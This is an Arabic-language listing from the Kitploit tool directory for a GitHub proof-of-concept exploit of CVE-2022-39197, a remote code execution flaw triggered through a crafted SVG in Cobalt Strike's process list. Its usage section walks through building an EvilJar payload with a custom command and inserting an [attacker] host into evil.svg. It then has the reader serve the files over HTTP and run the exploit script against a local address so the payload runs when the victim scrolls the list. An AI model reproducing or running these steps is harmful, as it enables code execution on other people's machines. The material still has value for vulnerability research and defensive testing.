Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-39197-RCE — CVE-2022-39197 RCE POC | Kitploit
أدوات/GitHubGitHub/thecryinggame/cve-2022-39197-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةتطوير الحمولات
GitHubthecryinggame/cve-2022-39197-rce

CVE-2022-39197-RCE

CVE-2022-39197 RCE POC

عرض المستودع
134منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-39197-RCE

أولاً

تم تعديل هذا المشروع من مشروع @its-arun https://github.com/its-arun/CVE-2022-39197

عندما اختبرت السكربت، وجدت أن سكربت frida لا يمكنه الاستعلام عن البيانات بالترتيب الطبيعي. الطريقة هي تعديل سكربت frida لتعديل اسم العملية.

شكرًا للأستاذ @Kai5174 لمساهمته في طريقة الاستغلال.

الاستخدام

  • تجهيز الحمولة

1、عدّل الأمر الذي يتم تنفيذه مع الحمولة الخاصة بك في EvilJar/src/main/java/Exploit.java، حاليًا يمكنه فقط تشغيل الآلة الحاسبة.

2、قم بالبناء باستخدام jar mvn clean compile assembly:single

4、انقل EvilJar-1.0-jar-with-dependencies.jar من مجلد EvilJar/target/ إلى مجلد serve/

5、عدّل serve\evil.svg واستبدل [attacker]

6、قدّم الملفات باستخدام python3 -m http.server 8080

7、أنشئ beacon.exe بإصدار C2 أقل من أو يساوي 4.7

8、تحتاج إلى تنفيذ سكربت py على نظام Windows ليتصل الجهاز، واتخاذ إجراءات مضادة عندما يصل العميل إلى قائمة العمليات ويرى عملية beacon.exe.

  • تنفيذ الاستغلال
root@kitploit:~
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg

سيتم تشغيل الحمولة بمجرد قيام المستخدم بالتمرير عبر قائمة العمليات (Process List)

إثبات المفهوم (POC)

ويندوز 1.png

ماك 2.jpg

المراجع

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — يوجد تحليل رائع ومتعمق لهذه الثغرة الأمنية https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html

مُعدَّل من https://github.com/its-arun/CVE-2022-39197

تنزيل الأداة